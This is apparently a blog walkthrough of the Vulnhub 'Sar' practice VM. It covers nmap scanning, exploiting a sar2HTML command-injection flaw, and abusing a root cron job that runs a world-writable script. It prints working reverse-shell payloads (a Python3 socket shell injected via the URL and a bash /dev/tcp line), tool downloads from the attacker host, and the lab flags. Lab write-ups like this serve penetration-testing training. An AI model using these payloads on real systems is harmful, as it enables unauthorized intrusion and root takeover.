Sar — Walkthrough
Sar is an OSCP-like VM with the intent of gaining experience
in the world of penetration testing.
Recently, a bunch of new boxes got released on Vulnhub. I decided to take a look at them because I wanted to see if I can find any OSCP related machines. “Sar” was the only machine that caught my eye. It’s definitely one of the easier ones and it doesn’t require much time to complete it. With that said, let’s get started!
Port Scanning
First, I started with a very simple port scan which included all ports, version / OS enumeration and default scripts. However, only one open port turned up.
t0thkr1s : ~
≫ nmap -A -Pn -p- 192.168.1.69
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-05 10:17 CET
Nmap scan report for 192.168.1.69
Host is up (0.0013s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It worksDefault Apache2 page, nothing interesting there. I quickly checked the most basic thing which is robots.txt . It contained a single entry named sar2HTML .
I found the following web application under the previously discovered directory. At this point, I had a pretty good feeling about this.
The important part here is that we have the app name and version number in the top left corner. I searched for publicly available exploits and found out that the app is vulnerable to Remote Command Execution.
Gaining Access
The exploit description can be found here: https://www.exploit-db.com/exploits/47204
As you can see on the above GIF, we get the output of the command under the Select Host spinner or wathever it’s called.
It was time to get a reverse shell out of this. I checked wether Python was installed or not and it turns out we can utilize Python3 to get a connection back. Here’s what I used:
192.168.1.69/sar2HTML/index.php?plot=;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.65",1010));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'After that I immediately got a hit on my reverse shell listener.
t0thkr1s : ~
≫ ncat -lvp 1010
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1010
Ncat: Listening on 0.0.0.0:1010
Ncat: Connection from 192.168.1.69.
Ncat: Connection from 192.168.1.69:55624.
bash: cannot set terminal process group (677): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@sar:/var/www/html/sar2HTML$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@sar:/var/www/html/sar2HTML$ cd /home
www-data@sar:/home$ ls
love
www-data@sar:/home$ cd love
www-data@sar:/home/love$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos
www-data@sar:/home/love$ cd Desktop
www-data@sar:/home/love/Desktop$ ls
user.txt
www-data@sar:/home/love/Desktop$ cat user.txt
427a7e47deb4a8649c7cab38df232b52
www-data@sar:/home/love/Desktop$User Flag: 427a7e47deb4a8649c7cab38df232b52
Privilege Escalation
I prepared my favorite script to find privilege escalation vectors and tranferred it to the target machine using a simple HTTP server. It’s highly recommended, you can find it here: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
The best thing about this shell script is that it highlights the possible privesc vectors, so you don’t have to read through hunders of lines.
www-data@sar:/var/www/html$ cd /tmp
www-data@sar:/tmp$ wget 192.168.1.65/linpeas.sh
--2020-03-05 15:07:21-- http://192.168.1.65/linpeas.sh
Connecting to 192.168.1.65:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 159180 (155K) [application/x-sh]
Saving to: 'linpeas.sh'linpeas.sh 100%[===================>] 155.45K --.-KB/s in 0.001s2020-03-05 15:07:21 (151 MB/s) - 'linpeas.sh' saved [159180/159180]www-data@sar:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@sar:/tmp$ ./linpeas.sh... snip ...[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-jobs
-rw-r--r-- 1 root root 787 Oct 21 01:04 /etc/crontab... snip ...SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin*/5 * * * * root cd /var/www/html/ && sudo ./finally.shSHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root1 5 cron.daily run-parts --report /etc/cron.daily
7 10 cron.weekly run-parts --report /etc/cron.weekly
@monthly 15 cron.monthly run-parts --report /etc/cron.monthly
There was a cronjob running as root which executes the finally.sh shell script in the /var/www/html directory every five minutes. If you're unfamiliar with crontab schedule expression, you can use https://crontab.guru.
Unfortunately, we can’t edit that shell script directly but we can read it. Nothing special, it executes another shell script called write.sh .
www-data@sar:/var/www/html$ ls -la
total 40
drwxr-xr-x 3 www-data www-data 4096 Mar 5 15:32 .
drwxr-xr-x 5 www-data www-data 4096 Mar 5 15:07 ..
-rwxr-xr-x 1 root root 22 Oct 20 21:18 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20 20:34 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 21:03 phpinfo.php
-rw-r--r-- 1 root root 9 Oct 21 03:10 robots.txt
drwxr-xr-x 4 www-data www-data 4096 Oct 20 21:06 sar2HTML
-rwxrwxrwx 1 www-data www-data 55 Mar 5 15:32 write.sh
www-data@sar:/var/www/html$ cat finally.sh
#!/bin/sh./write.sh
I figured why not delete this write.sh script (since we have all the permission to do it) and replace it with a cute reverse shell. Anyway, I created the following script:
t0thkr1s : ~/Downloads
≫ cat write.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.65/9999 0>&1After transferring it to the target, I set every permission with chmod 777 write.sh and set up my ncat listener on port 9999.
www-data@sar:/tmp$ cd /var/www/html
www-data@sar:/var/www/html$ ls -la
total 40
drwxr-xr-x 3 www-data www-data 4096 Oct 21 05:20 .
drwxr-xr-x 5 www-data www-data 4096 Mar 5 15:07 ..
-rwxr-xr-x 1 root root 22 Oct 20 21:18 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20 20:34 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 21:03 phpinfo.php
-rw-r--r-- 1 root root 9 Oct 21 03:10 robots.txt
drwxr-xr-x 4 www-data www-data 4096 Oct 20 21:06 sar2HTML
-rwxrwxrwx 1 www-data www-data 30 Oct 21 02:00 write.sh
www-data@sar:/var/www/html$ rm write.sh
www-data@sar:/var/www/html$ wget 192.168.1.65/write.sh
--2020-03-05 15:32:59-- http://192.168.1.65/write.sh
Connecting to 192.168.1.65:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55 [application/x-sh]
Saving to: 'write.sh'write.sh 100%[===================>] 55 --.-KB/s in 0s2020-03-05 15:32:59 (9.99 MB/s) - 'write.sh' saved [55/55]www-data@sar:/var/www/html$ chmod 777 write.sh
www-data@sar:/var/www/html$ ls -la
total 40
drwxr-xr-x 3 www-data www-data 4096 Mar 5 15:32 .
drwxr-xr-x 5 www-data www-data 4096 Mar 5 15:07 ..
-rwxr-xr-x 1 root root 22 Oct 20 21:18 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20 20:34 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 21:03 phpinfo.php
-rw-r--r-- 1 root root 9 Oct 21 03:10 robots.txt
drwxr-xr-x 4 www-data www-data 4096 Oct 20 21:06 sar2HTML
-rwxrwxrwx 1 www-data www-data 55 Mar 5 15:32 write.sh
www-data@sar:/var/www/html$
I waited a couple minutes and got my reverse shell with root privileges.
t0thkr1s : ~
≫ ncat -lvp 9999
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.1.69.
Ncat: Connection from 192.168.1.69:37982.
bash: cannot set terminal process group (20143): Inappropriate ioctl for device
bash: no job control in this shell
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# cd /root
root@sar:~# ls
root.txt
root@sar:~# cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99Root Flag: 66f93d6b2ca96c9ad78a8a9ba0008e99
Before You Go
Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! & Feedback is always welcome! 🙏
